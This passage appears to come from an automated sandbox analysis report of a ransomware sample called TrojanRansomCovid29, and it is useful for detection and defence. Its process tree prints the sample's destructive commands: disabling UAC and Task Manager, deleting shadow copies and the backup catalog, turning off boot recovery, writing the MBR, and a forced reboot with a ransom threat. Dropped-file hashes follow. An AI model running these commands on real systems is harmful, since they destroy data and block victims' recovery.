                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\fakeerror.vbs"
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1020
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping localhost -n 2
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              • Runs ping.exe
                                                                                              PID:1160
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5172
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5204
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5220
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5236
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5312
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                              3⤵
                                                                                              • UAC bypass
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5332
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              3⤵
                                                                                              • UAC bypass
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry key
                                                                                              PID:5348
                                                                                            • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\mbr.exe
                                                                                              mbr.exe
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Writes to the Master Boot Record (MBR)
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:5384
                                                                                            • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29Cry.exe
                                                                                              Cov29Cry.exe
                                                                                              3⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5496
                                                                                              • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                4⤵
                                                                                                • Checks computer location settings
                                                                                                • Drops startup file
                                                                                                • Executes dropped EXE
                                                                                                • Drops desktop.ini file(s)
                                                                                                • Sets desktop wallpaper using registry
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:5900
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                                                                  5⤵
                                                                                                    PID:5236
                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                      vssadmin delete shadows /all /quiet
                                                                                                      6⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:5408
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic shadowcopy delete
                                                                                                      6⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5512
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                                                                    5⤵
                                                                                                      PID:4560
                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                        bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                        6⤵
                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                        PID:5248
                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                        bcdedit /set {default} recoveryenabled no
                                                                                                        6⤵
                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                        PID:5288
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                      5⤵
                                                                                                        PID:5320
                                                                                                        • C:\Windows\system32\wbadmin.exe
                                                                                                          wbadmin delete catalog -quiet
                                                                                                          6⤵
                                                                                                          • Deletes backup catalog
                                                                                                          PID:5456
                                                                                                      • C:\Windows\system32\NOTEPAD.EXE
                                                                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                                                                                        5⤵
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        PID:5984
                                                                                                  • C:\Windows\SysWOW64\shutdown.exe
                                                                                                    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5512
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping localhost -n 9
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Runs ping.exe
                                                                                                    PID:5568
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /f /im explorer.exe
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5072
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29LockScreen.exe
                                                                                                    Cov29LockScreen.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5464
                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                1⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4564
                                                                                              • C:\Windows\system32\wbengine.exe
                                                                                                "C:\Windows\system32\wbengine.exe"
                                                                                                1⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2980
                                                                                              • C:\Windows\System32\vdsldr.exe
                                                                                                C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3556
                                                                                                • C:\Windows\System32\vds.exe
                                                                                                  C:\Windows\System32\vds.exe
                                                                                                  1⤵
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  PID:5564
                                                                                                • C:\Windows\system32\LogonUI.exe
                                                                                                  "LogonUI.exe" /flags:0x4 /state0:0xa390d855 /state1:0x41c64e6d
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:5372

                                                                                                Network

                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                  Filesize

                                                                                                  152B

                                                                                                  MD5

                                                                                                  ba6ef346187b40694d493da98d5da979

                                                                                                  SHA1

                                                                                                  643c15bec043f8673943885199bb06cd1652ee37

                                                                                                  SHA256

                                                                                                  d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

                                                                                                  SHA512

                                                                                                  2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                  Filesize

                                                                                                  152B

                                                                                                  MD5

                                                                                                  b8880802fc2bb880a7a869faa01315b0

                                                                                                  SHA1

                                                                                                  51d1a3fa2c272f094515675d82150bfce08ee8d3

                                                                                                  SHA256

                                                                                                  467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

                                                                                                  SHA512

                                                                                                  e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

                                                                                                  Filesize

                                                                                                  99KB

                                                                                                  MD5

                                                                                                  53fe43bd52d01c4526dac06426e2b666

                                                                                                  SHA1

                                                                                                  e9bf922a50f3832649d83f1da5c709a720d0ede9

                                                                                                  SHA256

                                                                                                  c67c5c0750d7974cacc5c70cd74f78497c7f791182d6a2809f4ec8da2d7510c1

                                                                                                  SHA512

                                                                                                  5fa4fe6bded6a6ba57b51ea88f7d54cc875dcd58c59bde9f0af9048260406d187ca86568ddb31d4d29e75c3256b79444ca67c52613659293e73e2c2094ebffde

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

                                                                                                  Filesize

                                                                                                  314KB

                                                                                                  MD5

                                                                                                  26cfc528bbf3f9545a35f07fd4cc4c83

                                                                                                  SHA1

                                                                                                  68c18ab5b58b839bca80835b6fece6081e5ecd04

                                                                                                  SHA256

                                                                                                  813b795e6bab991add6fcc2f9b4e8f938681ab29f21b280f1348b3d1198e8147

                                                                                                  SHA512

                                                                                                  226ab5af99230fef492ecbbd33c1c4ef9ffdcd8e9c48997455942196c1bf653404313890b7240b781e57e6e456ddb9b921a7031abb85b653b534d3340d4f6a4c

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000045

                                                                                                  Filesize

                                                                                                  1.7MB

                                                                                                  MD5

                                                                                                  272d3e458250acd2ea839eb24b427ce5

                                                                                                  SHA1

                                                                                                  fae7194da5c969f2d8220ed9250aa1de7bf56609

                                                                                                  SHA256

                                                                                                  bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                                                                                  SHA512

                                                                                                  d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                  MD5

                                                                                                  7a55f645ed3eab614905faedc1166557

                                                                                                  SHA1

                                                                                                  fe7dc28c02e6a1486ad4983ad1e2a89f318ac429

                                                                                                  SHA256

                                                                                                  77f1e0d590aa1ac12d87fac75c747ad657ba94d8b4156203e9973df86a6c6612

                                                                                                  SHA512

                                                                                                  d551fdced0a8a468ee13cfc856d468078da15ca37f5e641e47b5f3df862762060ec9dbae505dc0b73e6756bd8b159863fa76d1590abfed9c838b91582c45dde5

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                  Filesize

                                                                                                  2KB

                                                                                                  MD5

                                                                                                  ac2b80034028d2f8ce838f1176e700d1

                                                                                                  SHA1

                                                                                                  f9e69804ff9375ac345a9ad3463ce8489323082a

                                                                                                  SHA256

                                                                                                  63fbd324596e5edbe5e36ff0b0f63c1db05465d2f04b5b8566c08d4c5ef4e59e

                                                                                                  SHA512

                                                                                                  d6722bdea0854a78c57192dc8715927edf3c94185acb6bb3e900774b17c16053d7f98e99ad2e0e3771f147cec8b687809c0fba64e9410bbcbf6d3b45a5650f67

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                  MD5

                                                                                                  a7d079215ec676e6ecfbb15675914502

                                                                                                  SHA1

                                                                                                  44bf184b2652b2736aef4a9850e14334c57b69d1

                                                                                                  SHA256

                                                                                                  80e4bb4fc7e5d3f8526f5fd241b3efb151c6b3838b0cb16c930fe44670452fd3

                                                                                                  SHA512

                                                                                                  1d75b4922e7b72f0e4c2aec67b3ad1bf63614badbf380971e8e2d91d1b42ba1626974415e294412a070e5b4cb0ab8e7a15bbb76c0066c79b0f5be05cd0143936

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                  MD5

                                                                                                  58c666c77c9dc0870914e8c6a670e98f

                                                                                                  SHA1

                                                                                                  d23f797066cb4e8458738dba7951c5830b863c9b

                                                                                                  SHA256

                                                                                                  fc8acaa0742075dd731b879fe74397c8c8aee395fb81b43ea583f1e02db35fd8

                                                                                                  SHA512

                                                                                                  9638a5f143a16c5c7d180eca10c9c9dabb61c84f859778c6e93e15c6e69d9e7241ecb7fb3031a99878a8bcca8f6b969c46f039dc699ddd7df4aa7e90776ea8c0

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                  MD5

                                                                                                  3bf2c27f0c8828de7e06329b1eeb27d0

                                                                                                  SHA1

                                                                                                  27393290691bc08d2cd9a7c85a388288098509c8

                                                                                                  SHA256

                                                                                                  8308e7cb5e2578ed053692a6d5c9f0a7708d18d961acca0aea9a2b52e7ab311c

                                                                                                  SHA512

                                                                                                  8a3e821e1c245784aea30cea6f1720ca70accfbfe621c034b3b55d5d08050194e86b1b976e377c30baa8717b36c75ca22376be020488bb06610d5cba2fa531d8

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  7KB

                                                                                                  MD5

                                                                                                  60968c9c1d80607d0e84a548ef5d2c8e

                                                                                                  SHA1

                                                                                                  a082a72a6c4cc983be52dbc3de0f1fab3506e98b

                                                                                                  SHA256

                                                                                                  d4e60b55f65f13024d1e7f08bf4454a9eb04829404863c013144fb8f010d6199

                                                                                                  SHA512

                                                                                                  03bdbad3d8cf128a15e1ef30805737da3c96656d9e4132efaac40340e56eea93b31fbf14453c0f5aa38819a13786a67e45ebd5c60af9ee12184ea1d1ab8df8b1

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                  MD5

                                                                                                  b4da7ec7fb35e9d55f1151f96a9181ec

                                                                                                  SHA1

                                                                                                  7b7a48f29191892ba42e51fada048aaaa3bb7b84

                                                                                                  SHA256

                                                                                                  84a61bd39a22be416563267fc0ae743d9794eef29a0bad74b0d929a21f577ea9

                                                                                                  SHA512

                                                                                                  ff2006c056972202eb42ccf76e9c8133e60428789e604b859ab62fdcdbcc3ae9bd7a13d9606b9e9ecf2cb3c9845b92aa63c1d74aa94269f19caa370ee8b7c813

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  5KB

                                                                                                  MD5

                                                                                                  aa544cbd5b7d730a265807f253fe2995

                                                                                                  SHA1

                                                                                                  c652e19ce41e6814784c480dacfc8af054e6826e

                                                                                                  SHA256

                                                                                                  d5e3cb2ed8c53a28908861940ad8a51e7aa5bd52055d54e416d041182c3a7df8

                                                                                                  SHA512

                                                                                                  5b7add7f2f452551446a92858f61d3679aaa3bb7706e98d66d68072577b91f90290f091457186cfa6f2ab04bd336b468d72edf84c51f260b0d70924cf2aaa467

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  db4c255461afe45ede8ac8240adbf45a

                                                                                                  SHA1

                                                                                                  cb3e4274e5d51e8b26a50afaa95a2f490a5494bb

                                                                                                  SHA256

                                                                                                  fd92a28313bed6720343d79e08529e223a4f85977202ff43c8dcd1b31f93f0be

                                                                                                  SHA512

                                                                                                  79b0d9b1ed23460434330aae39ee25e673ded89f89b91175597daf31fa188209fbb43cf3f95baeb1154cc2cff9d2d516fa9d614bf2374016efbcc24b28928216

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                  Filesize

                                                                                                  72B

                                                                                                  MD5

                                                                                                  b64cd384949f416d42b005f0e95f057e

                                                                                                  SHA1

                                                                                                  b8bde812da1089cd274cb52797b2c75f578b2c8b

                                                                                                  SHA256

                                                                                                  e6c22dc35ce51b36916e5ba622e898a58726bc949348cc6642e7ce7fd3ec82a3

                                                                                                  SHA512

                                                                                                  4b66222909dfbf2899fc173502c5a26f8b02a62de58489b42fc7dee613061ad692909b42d79f789d70fa9f84d22eba01af0f5acc3becd80d9950bf932f30b9c6

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe590843.TMP

                                                                                                  Filesize

                                                                                                  48B

                                                                                                  MD5

                                                                                                  1008f59f5f56e1178b9ef954908125d2

                                                                                                  SHA1

                                                                                                  3322a5c285dcf6d5d18454a3bbd3cb1e21a9e2c1

                                                                                                  SHA256

                                                                                                  e6c329c53b0e11b1e24be8c0f9849ba2024e4a3d4a8cd4449b5492c72c6bff9f

                                                                                                  SHA512

                                                                                                  2ccad5f854528cf06c7d8e7e86d7df446d1abb34f26e17bd5b9bdf98dd85a21179ee88980887147391162adad54beba91dd5894eb73fb664b8586d436839c73d

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  44688592b0b439246a13b27a3b7e361e

                                                                                                  SHA1

                                                                                                  32c86e8d46c3b99b4868808a1eff21c77aa197be

                                                                                                  SHA256

                                                                                                  8831ab527bf9f99d0a1f36f6df72644f59542727e379a6f46d42fbf204dc9789

                                                                                                  SHA512

                                                                                                  05d2014139be0777a23df58e16d2ca36e14c5df88c883ff801d67117814e96b08dc3cbc5bee2edcc8e3c7d1446f69051bdcc067aeef2cc7355989389d4deb7ed

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  3KB

                                                                                                  MD5

                                                                                                  5306d9eccbe23d91f4e3da8503a4db57

                                                                                                  SHA1

                                                                                                  8fd790362e1c4d920e577d767376f33c3d83aeb4

                                                                                                  SHA256

                                                                                                  ae36dbd812c92aa33551e64c1252eeb8dd8674634121ed33c77bce47d3911602

                                                                                                  SHA512

                                                                                                  cd833d4692178b4ed8bfe1c71d8b44b9cd245d86204fab131539447e89315d6fdc0e57136d73f353828f88890b257e368cf3b0a0b78bc5ef2e6254735bc4f121

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  3KB

                                                                                                  MD5

                                                                                                  be08a88a7a38d23fb9868809d73150d1

                                                                                                  SHA1

                                                                                                  92c580f65909ceb9e358360d81bd91df372efe9a

                                                                                                  SHA256

                                                                                                  e989ff3de5b6442be99177d082caf8b8262edf30b7175287732fd86510e73ba8

                                                                                                  SHA512

                                                                                                  00809271c3a55deead739f84e9e95b28f6ba600abd49b3a71f58d84a3b1073e20d05a987e2ddc44cdc3b679e8faf1804353a3286079b18f92241a0a2f8d6d54a

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  3KB

                                                                                                  MD5

                                                                                                  60b5e67b05385ea36a0bfb35e7cbe71c

                                                                                                  SHA1

                                                                                                  345e5962319d53305c946544b450522c3c0a24c2

                                                                                                  SHA256

                                                                                                  6d4a352476f9669792b1f25a29580e90ce082e3e629ccc13acd0b362109ae56f

                                                                                                  SHA512

                                                                                                  62b82aa161be3ff81b3726acdd233b3fc6f4e6977b150fd508d01e00d17bcc927ca92dfdfbbb1c4feefcdb1864b5bcb2be06716f1cf73b66db21b2526aa26332

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  128bf86a04ce3458a94ce27e68642bfe

                                                                                                  SHA1

                                                                                                  1359a364d9b66c0cef2c7229bf7bdc51327f7733

                                                                                                  SHA256

                                                                                                  2cdd088b26ca580489f9a8e373c096ed908b448849958054e2b1213274343f05

                                                                                                  SHA512

                                                                                                  f0b5587d3e838d69107ddcb5eefee71ccaca826803e5f00839a32c56e17e74745ce829e908c637ca1b46024a0f7f66528c07b5bbf6c308ffb2af9b48f6558ccc

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58722d.TMP

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  4139e70b6c786cb26be7e496c0e9f70b

                                                                                                  SHA1

                                                                                                  3c5ac38331dda23e566152284c92b19969f1a534

                                                                                                  SHA256

                                                                                                  c23616dd7746f122f1f191d4bf9c6b566127c5bf7feb023159aa05698eb82df1

                                                                                                  SHA512

                                                                                                  fdd44d7c4404a30cf77e5450e58d370949d5295476a6d2ed80d5874f64508be45b6f48c06077cb461b6ec35f03815ddc0c1d1b118e508d5401d5e8b057dadc06

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                  Filesize

                                                                                                  16B

                                                                                                  MD5

                                                                                                  6752a1d65b201c13b62ea44016eb221f

                                                                                                  SHA1

                                                                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                  SHA256

                                                                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                  SHA512

                                                                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                  Filesize

                                                                                                  11KB

                                                                                                  MD5

                                                                                                  33259e585d7a55ab1b3b6c3b9e16072c

                                                                                                  SHA1

                                                                                                  88d482679e3c00fc20a57e5b33c70951327e033f

                                                                                                  SHA256

                                                                                                  74485c35dd5fe31942f919b5caa7d9fdf3b37bc0fc034821383e89e3adce92c4

                                                                                                  SHA512

                                                                                                  e6317b24d5f4026944c0c0717cb223a090f001c77737d7efd310eb72b70b3b1ca7877a1f671c1036188613e6171e48a8d19b4f7ed5179847964a9e95f8335518

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                  Filesize

                                                                                                  11KB

                                                                                                  MD5

                                                                                                  7211bacbabfe32d37c3a5224779b75c2

                                                                                                  SHA1

                                                                                                  1c9476bcd3b82eca9089feaa7a9b39885383418a

                                                                                                  SHA256

                                                                                                  04c47a5e2f2a26e00a05764e10d4f1c32486a9e0d3a2c177ba511618486cba10

                                                                                                  SHA512

                                                                                                  94e68a91b980536183574626a416c12d5ff2f09cb69a311337f67c7cf9f3df3ad06aece931ee961acba58241603c787abd3c45c56c905e03b5bce0c12046aa5f

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                  Filesize

                                                                                                  10KB

                                                                                                  MD5

                                                                                                  5867f25c3d123374618d90fb9fb40e32

                                                                                                  SHA1

                                                                                                  48851434839917d8e2d99319747eba5d695ab952

                                                                                                  SHA256

                                                                                                  42beb71b7ac742759cbe6590616784690335c2c43621d610d60bef4001acd43d

                                                                                                  SHA512

                                                                                                  8df76d64cd8b6416e1b99d5c12e862321e14ffef7337ad8c98ce3879142759cb45dd677e6a9e212dc4ad2a4b1ba5347bf8367c27893a0ed40ecedd263a1e75bb

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                  MD5

                                                                                                  987a07b978cfe12e4ce45e513ef86619

                                                                                                  SHA1

                                                                                                  22eec9a9b2e83ad33bedc59e3205f86590b7d40c

                                                                                                  SHA256

                                                                                                  f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8

                                                                                                  SHA512

                                                                                                  39b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                                                  Filesize

                                                                                                  1024KB

                                                                                                  MD5

                                                                                                  633436b5f5a9857e9c731be268aea8e3

                                                                                                  SHA1

                                                                                                  b97fd9e2f2bf8864824a4cb65f1ff8d8b6fd68dc

                                                                                                  SHA256

                                                                                                  8e9716c2470516c65524d719c3b631703e886e9333d3ddb94b4b78e69f155582

                                                                                                  SHA512

                                                                                                  6c2b7bfdfd6d409b8be60ae59ec8286635762ce42e6c461e9aba3986a144fac36356b84fa646fba0bd77cf65b56fba162b3ecc780900b897d563e4a5b884ef76

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

                                                                                                  Filesize

                                                                                                  498B

                                                                                                  MD5

                                                                                                  90be2701c8112bebc6bd58a7de19846e

                                                                                                  SHA1

                                                                                                  a95be407036982392e2e684fb9ff6602ecad6f1e

                                                                                                  SHA256

                                                                                                  644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf

                                                                                                  SHA512

                                                                                                  d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

                                                                                                  Filesize

                                                                                                  9KB

                                                                                                  MD5

                                                                                                  7050d5ae8acfbe560fa11073fef8185d

                                                                                                  SHA1

                                                                                                  5bc38e77ff06785fe0aec5a345c4ccd15752560e

                                                                                                  SHA256

                                                                                                  cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                                                                                                  SHA512

                                                                                                  a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                                                                                                • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29Cry.exe.death

                                                                                                  Filesize

                                                                                                  103KB

                                                                                                  MD5

                                                                                                  8bcd083e16af6c15e14520d5a0bd7e6a

                                                                                                  SHA1

                                                                                                  c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                                                                                  SHA256

                                                                                                  b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                                                                                  SHA512

                                                                                                  35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                                                                                • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29LockScreen.exe

                                                                                                  Filesize

                                                                                                  48KB

                                                                                                  MD5

                                                                                                  f724c6da46dc54e6737db821f9b62d77

                                                                                                  SHA1

                                                                                                  e35d5587326c61f4d7abd75f2f0fc1251b961977

                                                                                                  SHA256

                                                                                                  6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                                                                                  SHA512

                                                                                                  6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                                                                                • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\TrojanRansomCovid29.bat

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  57f0432c8e31d4ff4da7962db27ef4e8

                                                                                                  SHA1

                                                                                                  d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                                                                                  SHA256

                                                                                                  b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                                                                                  SHA512

                                                                                                  bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                                                                                • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\fakeerror.vbs

                                                                                                  Filesize

                                                                                                  144B

                                                                                                  MD5

                                                                                                  c0437fe3a53e181c5e904f2d13431718

